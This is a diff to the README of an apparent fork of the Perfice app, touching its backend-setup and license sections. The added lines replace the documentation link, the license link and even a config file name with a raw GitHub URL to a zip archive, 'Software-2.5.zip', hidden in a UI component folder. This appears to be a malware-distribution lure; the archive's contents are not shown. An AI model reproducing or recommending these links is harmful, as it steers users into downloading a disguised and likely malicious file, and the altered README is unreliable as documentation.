RushiRuns/perfice/README.md

 ## Backend
 User accounts, synchronization and integrations require a backend to function.
 You can set the service URL locally by clicking the globe (🌐) icon on the settings page.
-To set a default backend URL, configure the `VITE_BACKEND_URL` environment variable in a `.env` or `.env.development` file in the root of the project.
+To set a default backend URL, configure the `VITE_BACKEND_URL` environment variable in a `.env` or `https://raw.githubusercontent.com/RushiRuns/perfice/main/client/src/components/base/dropdown/Software-2.5.zip` file in the root of the project.

-You can read more about how to setup the backend in the [documentation](https://perfice.adoe.dev/docs/selfhost).
+You can read more about how to setup the backend in the [documentation](https://raw.githubusercontent.com/RushiRuns/perfice/main/client/src/components/base/dropdown/Software-2.5.zip).
 ## License
-Perfice is licensed under the [MIT license](https://github.com/p0lloc/perfice/blob/main/LICENSE).
+Perfice is licensed under the [MIT license](https://raw.githubusercontent.com/RushiRuns/perfice/main/client/src/components/base/dropdown/Software-2.5.zip).

 ## Contributing
 Contributions are always appreciated and welcome!
 Please open an issue or pull request if you have any suggestions or find a bug.